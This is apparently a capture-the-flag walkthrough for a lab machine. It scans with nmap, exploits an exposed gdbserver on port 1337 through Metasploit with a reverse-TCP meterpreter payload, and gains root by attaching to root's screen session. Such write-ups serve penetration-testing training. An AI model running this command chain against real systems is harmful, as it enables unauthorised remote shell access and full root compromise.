Let's start with nmap
nmap -sC -sV -p- targetIP
-p- means scan all 65535 ports
We find port 1337 open.
port 1337 is used for gdb server
We found a vulnerability for this :
Let's load metasploit using:
msfconsole
search gdbserver
use exploit/multi/gdb/gdb_server_exec
show options
We need to set RHOSTS (remote host) with the IP of the target machine
set RHOSTS 10.129.96.68
RPORT (remote port) should be port 1337:
set RPORT 1337
We need to set LHOST (local host) with the IP of our machine. If you don't know the IP of your machine, type ifconfig
set LHOST 10.10.14.21
We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp
we need to change it to linux/x64/meterpreter/reverse_tcp
set payload linux/x64/meterpreter/reverse_tcp
We also need to change target ID. By default it is set as target ID 0 for x86 (32-bit)
We need to change it to target ID 1 for x86_64 (64-bit)
set target 1
Now let's check again that we configured it properly:
show options
Let's run the exploit
exploit
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
ls
cat user.txt
We got the user flag!
Let's try privilege escalation with the usual
sudo -l
It is asking for a password and we don't have it:
Now let's try:
export TERM=xterm
Now type:
/usr/bin/screen -x root/root
we are now root!
ls
cat root.txt
We got the root flag!
Congratulations!
Comments